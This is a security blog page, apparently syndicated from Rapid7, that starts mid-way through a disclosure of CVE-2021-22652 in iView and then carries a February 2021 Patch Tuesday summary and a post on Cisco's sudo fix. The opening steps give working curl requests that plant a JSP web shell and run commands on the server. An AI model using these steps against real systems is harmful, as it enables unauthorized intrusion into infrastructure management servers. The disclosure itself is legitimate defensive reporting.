wvu@kharak:~$ curl -s http://[RHOST]:8080/iView3/NetworkServlet -d 'page_action_type=updateSystemSettings&json_obj={"PROMPATH":"c:\\IMCTrapService\\prom_bin\\","EXPORTPATH":"webapps\\iView3\\","IMPORTPATH":"c:\\IMCTrapService\\import\\","CONFIGPATH":"c:\\IMCTrapService\\config\\","DBBACKUPPATH":"c:\\IMCTrapService\\backup\\","ZTPTEMPLATESPATH":"c:\\IMCTrapService\\templates\\","SSHPORT":"22","TFTPPORT":"69","MAXBACKUPFILES":"3","NETWORKSCANTIMEOUT":"20","USERSESSIONTIMEOUT":"0","USECUSTOMNAMING":"0","CUSTOMNAMETEMPLATE":""}' | jq .[0]
{
  "PROMPATH": "c:\\IMCTrapService\\prom_bin\\",
  "EXPORTPATH": "webapps\\iView3\\",
  "IMPORTPATH": "c:\\IMCTrapService\\import\\",
  "CONFIGPATH": "c:\\IMCTrapService\\config\\",
  "DBBACKUPPATH": "c:\\IMCTrapService\\backup\\",
  "ZTPTEMPLATESPATH": "c:\\IMCTrapService\\templates\\",
  "SSHPORT": "22",
  "TFTPPORT": "69",
  "MAXBACKUPFILES": "3",
  "NETWORKSCANTIMEOUT": "20",
  "USERSESSIONTIMEOUT": "0",
  "USECUSTOMNAMING": "0",
  "CUSTOMNAMETEMPLATE": ""
}
wvu@kharak:~$

The updated configuration is, again, returned as a JSON object.

Step 3: Write JSP stub to provide command execution

The JSP decodes to
<%Runtime.getRuntime().exec(request.getParameter("c"));%> and is
written to webapps\iView3\x.jsp.

wvu@kharak:~$ curl http://[RHOST]:8080/iView3/NetworkServlet -d 'page_action_type=exportInventoryTable&col_list=<%25Runtime.getRuntime().exec(request.getParameter("c"));%25>-NULL&sortname=NULL&sortorder=&filename=x.jsp'
Export failed.
wvu@kharak:~$

Note that the returned error is immaterial to the exploit (the export "failed" because the tested instance has no data to export).

Step 4: Execute arbitrary commands

You should now be able to execute arbitrary commands by sending the c parameter to the /iView3/x.jsp script.

Note: Replace [USERNAME] with your desktop user.

wvu@kharak:~$ curl http://[RHOST]:8080/iView3/x.jsp -d "c=cmd.exe /c whoami > C:\Users\[USERNAME]\Desktop\vulnerable.txt"
nul
wvu@kharak:~$

Similar to Step 3, the nul returned value is immaterial to the exploit.

Vulnerability impact

The attack may be limited by the fact that iView web interfaces are generally not exposed to the internet and that iView is usually deployed as an internal web application. So, an attacker would first need to somehow connect to the iView server. However, since it is a web application, it’s not unthinkable to imagine that there may be a few exposed to the public internet.

Once an attacker has control of the iView server, the attacker can then manage the associated SmartWorx-enabled networked devices, which are typically IoT in nature and can have an effect on that physical infrastructure.

Remediating CVE-2021-22652

This issue was fixed in pre-release version 5.7.03.6112. Users who cannot update right away should ensure the iView web application is not reachable from untrusted networks, such as the internet.

Disclosure timeline

  • Wednesday, Aug. 26, 2020: Issue discovered by William Vu of Rapid7.
  • Thursday, Aug. 27, 2020: Initial disclosure to ICS-CERT via the CISA Service Desk.
  • Monday, Nov. 9, 2020: ICS-CERT confirms receipt and assigns ICS-VU-820719.
  • Friday, Feb. 5, 2021: Draft advisory for ICSA-21-040-02 confirmed by Rapid7.
  • Tuesday, Feb. 9, 2021: ICS Advisory ICSA-21-040-02 published by CISA.
  • Thursday, Feb 11, 2021: Rapid7 details on CVE-2021-22652 published.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Patch Tuesday – February 2021

Post Syndicated from Greg Wiseman original https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/

Patch Tuesday - February 2021

The second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft’s product families. Despite that, there’s still plenty to discuss this month.

Vulnerability Breakdown by Software Family

Family Vulnerability Count
Windows 28
ESU 14
Microsoft Office 11
Browser 9
Developer Tools 8
Microsoft Dynamics 2
Exchange Server 2
Azure 2
System Center 2

Exploited and Publicly Disclosed Vulnerabilities

One zero-day was announced: CVE-2021-1732 is a privilege elevation vulnerability affecting the Win32k component of Windows 10 and Windows Server 2019, reported to be exploited in the wild. Four vulnerabilities have been previously disclosed: CVE-2021-1727, a privilege elevation vulnerability in Windows Installer, affecting all supported versions of Windows; CVE-2021-24098, which is a denial of service (DoS) affecting Windows 10 and Server 2019; CVE-2021-24106, an information disclosure vulnerability affecting DirectX in Windows 10 and Server 2019; and CVE-2021-26701, an RCE in .NET Core.

Vulnerabilities in Windows TCP/IP

Microsoft also disclosed a set of three serious vulnerabilities affecting the TCP/IP networking stack in all supported versions of Windows. Two of these (CVE-2021-24074 and CVE-2021-24094) carry a base CVSSv3 score of 9.8 and could allow Remote Code Execution (RCE). CVE-2021-24094 is specific to IPv6 link-local addresses, meaning it isn’t exploitable over the public internet. CVE-2021-24074, however, does not have this limitation. The third, CVE-2021-24086, is a DoS vulnerability that could allow an attacker to trigger a “blue screen of death” on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.

In the event a patch cannot be applied immediately, such as on systems that cannot be rebooted, Microsoft has published mitigation guidance that will protect against exploitation of the TCP/IP vulnerabilities. Depending on the exposure of an asset, IPv4 Source Routing should be disabled via a Group Policy or a Netsh command, and IPv6 packet reassembly should be disabled via a separate Netsh command. IPv4 Source Routing requests and IPv6 fragments can also be blocked load balancers, firewalls, or other edge devices to mitigate these issues.

Zerologon Update

Back in August, 2020, Microsoft addressed a critical remote code vulnerability (CVE-2020-1472) affecting the Netlogon protocol (MS-NRPC), a.k.a. “Zerologon”. In October, Microsoft noted that attacks which exploit this weakness have been seen in the wild. On January 14, 2021, they reminded organizations that the February 2021 security update bundle will also be enabling “Domain Controller enforcement mode” by default to fully address this weakness. Any system that tries to make an insecure Netlogon connection will be denied access. Any business-critical process that relies on these insecure connections will cease to function. Rapid7 encourages all organizations to heed the detailed guidance before applying the latest updates to ensure continued business process continuity.

Adobe

Most important amongst the six security advisories published by Adobe today is APSB21-09, detailing 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow Arbitrary Code Execution, and one of which (CVE-2021-21017), has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.

Summary Tables

Azure Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-24109 Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability No No 6.8 Yes
CVE-2021-24087 Azure IoT CLI extension Elevation of Privilege Vulnerability No No 7 Yes

Browser Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-24100 Microsoft Edge for Android Information Disclosure Vulnerability No No 5 Yes
CVE-2021-24113 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability No No 4.6 Yes
CVE-2021-21148 Chromium CVE-2021-21148: Heap buffer overflow in V8 N/A N/A nan Yes
CVE-2021-21147 Chromium CVE-2021-21147: Inappropriate implementation in Skia N/A N/A nan Yes
CVE-2021-21146 Chromium CVE-2021-21146: Use after free in Navigation N/A N/A nan Yes
CVE-2021-21145 Chromium CVE-2021-21145: Use after free in Fonts N/A N/A nan Yes
CVE-2021-21144 Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups N/A N/A nan Yes
CVE-2021-21143 Chromium CVE-2021-21143: Heap buffer overflow in Extensions N/A N/A nan Yes
CVE-2021-21142 Chromium CVE-2021-21142: Use after free in Payments N/A N/A nan Yes

Developer Tools Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-26700 Visual Studio Code npm-script Extension Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-1639 Visual Studio Code Remote Code Execution Vulnerability No No 7 No
CVE-2021-1733 Sysinternals PsExec Elevation of Privilege Vulnerability No Yes 7.8 Yes
CVE-2021-24105 Package Managers Configurations Remote Code Execution Vulnerability No No 8.4 Yes
CVE-2021-24111 .NET Framework Denial of Service Vulnerability No No 7.5 No
CVE-2021-1721 .NET Core and Visual Studio Denial of Service Vulnerability No Yes 6.5 No
CVE-2021-26701 .NET Core Remote Code Execution Vulnerability No Yes 8.1 Yes
CVE-2021-24112 .NET Core Remote Code Execution Vulnerability No No 8.1 Yes

ESU Windows Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-24080 Windows Trust Verification API Denial of Service Vulnerability No No 6.5 No
CVE-2021-24074 Windows TCP/IP Remote Code Execution Vulnerability No No 9.8 Yes
CVE-2021-24094 Windows TCP/IP Remote Code Execution Vulnerability No No 9.8 Yes
CVE-2021-24086 Windows TCP/IP Denial of Service Vulnerability No No 7.5 Yes
CVE-2021-1734 Windows Remote Procedure Call Information Disclosure Vulnerability No No 7.5 Yes
CVE-2021-25195 Windows PKU2U Elevation of Privilege Vulnerability No No 7.8 Yes
CVE-2021-24088 Windows Local Spooler Remote Code Execution Vulnerability No No 8.8 No
CVE-2021-1727 Windows Installer Elevation of Privilege Vulnerability No Yes 7.8 No
CVE-2021-24077 Windows Fax Service Remote Code Execution Vulnerability No No 9.8 Yes
CVE-2021-1722 Windows Fax Service Remote Code Execution Vulnerability No No 8.1 Yes
CVE-2021-24102 Windows Event Tracing Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-24103 Windows Event Tracing Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-24078 Windows DNS Server Remote Code Execution Vulnerability No No 9.8 Yes
CVE-2021-24083 Windows Address Book Remote Code Execution Vulnerability No No 7.8 No

Exchange Server Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-24085 Microsoft Exchange Server Spoofing Vulnerability No No 6.5 Yes
CVE-2021-1730 Microsoft Exchange Server Spoofing Vulnerability No No 5.4 Yes

Microsoft Dynamics Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-1724 Microsoft Dynamics Business Central Cross-site Scripting Vulnerability No No 6.1 No
CVE-2021-24101 Microsoft Dataverse Information Disclosure Vulnerability No No 6.5 Yes

Microsoft Office Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-24073 Skype for Business and Lync Spoofing Vulnerability No No 6.5 No
CVE-2021-24099 Skype for Business and Lync Denial of Service Vulnerability No No 6.5 No
CVE-2021-24114 Microsoft Teams iOS Information Disclosure Vulnerability No No 5.7 Yes
CVE-2021-1726 Microsoft SharePoint Spoofing Vulnerability No No 8 Yes
CVE-2021-24072 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8 No
CVE-2021-24066 Microsoft SharePoint Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-24071 Microsoft SharePoint Information Disclosure Vulnerability No No 5.3 Yes
CVE-2021-24067 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-24068 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-24069 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-24070 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes

System Center Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-1728 System Center Operations Manager Elevation of Privilege Vulnerability No No 8.8 Yes
CVE-2021-24092 Microsoft Defender Elevation of Privilege Vulnerability No No 7.8 Yes

Windows Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed CVSSv3 Base Score FAQ?
CVE-2021-1732 Windows Win32k Elevation of Privilege Vulnerability Yes No 7.8 No
CVE-2021-1698 Windows Win32k Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-24075 Windows Network File System Denial of Service Vulnerability No No 6.8 No
CVE-2021-24084 Windows Mobile Device Management Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-24096 Windows Kernel Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-24093 Windows Graphics Component Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-24106 Windows DirectX Information Disclosure Vulnerability No Yes 5.5 Yes
CVE-2021-24098 Windows Console Driver Denial of Service Vulnerability No Yes 5.5 Yes
CVE-2021-24091 Windows Camera Codec Pack Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-24079 Windows Backup Engine Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-1731 PFX Encryption Security Feature Bypass Vulnerability No No 5.5 Yes
CVE-2021-24082 Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability No No 4.3 No
CVE-2021-24076 Microsoft Windows VMSwitch Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-24081 Microsoft Windows Codecs Library Remote Code Execution Vulnerability No No 7.8 No

Summary Charts

Patch Tuesday - February 2021
Patch Tuesday - February 2021
Patch Tuesday - February 2021
Patch Tuesday - February 2021

Note: Chart data is reflective of data presented by Microsoft’s CVRF at the time of writing.

Cisco Patches Recently Disclosed “sudo” Vulnerability (CVE-2021-3156) in Multiple Products

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/02/04/cisco-patches-recently-disclosed-sudo-vulnerability-cve-2021-3156-in-multiple-products/

Cisco Patches Recently Disclosed

While Punxsutawney Phil may have said we only have six more weeks of winter, the need to patch software and hardware weaknesses will, unfortunately, never end.

Cisco has released security updates to address vulnerabilities in most of their product portfolio, some of which may be exploited to gain full system/device control on certain devices, and one fixes the recently disclosed sudo input validation vulnerability. We discuss this vulnerability below, but there are many more lower-severity, or “valid administrator credentials-required” bugs on the Cisco Security Advisories page that all organizations who use Cisco products should review.

Getting back to RBAC

Cisco Patches Recently Disclosed

The “sudo” advisory is officially presented as “Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021” and affects pretty much every Cisco product that has a command line interface. It is a fix for the ubiquitous CVE-2021-3156 general sudo weakness.

According to the advisory, the vulnerability is due to “improper parsing of command line parameters that may result in a heap-based buffer overflow. An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the sudoedit command with crafted parameters or by executing a binary exploit.”

All commands invoked after exploiting this vulnerability will have root privileges.

This weakness will also enable lower-privileged users with access to Cisco devices to elevate their privileges, meaning you technically are out of compliance with any role-based access control requirement (which is in virtually every modern cybersecurity compliance framework).

Rapid7 strongly advises organizations to patch this weakness as soon as possible to stop attackers and curious users from taking control of your network, as well as ensuring you are able to continue checking ✅ this particular compliance box. Even though we mentioned it at the top of the post, don’t forget to check out the rest of the Cisco security advisories to see whether you need to address weaknesses in any of your other Cisco devices.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.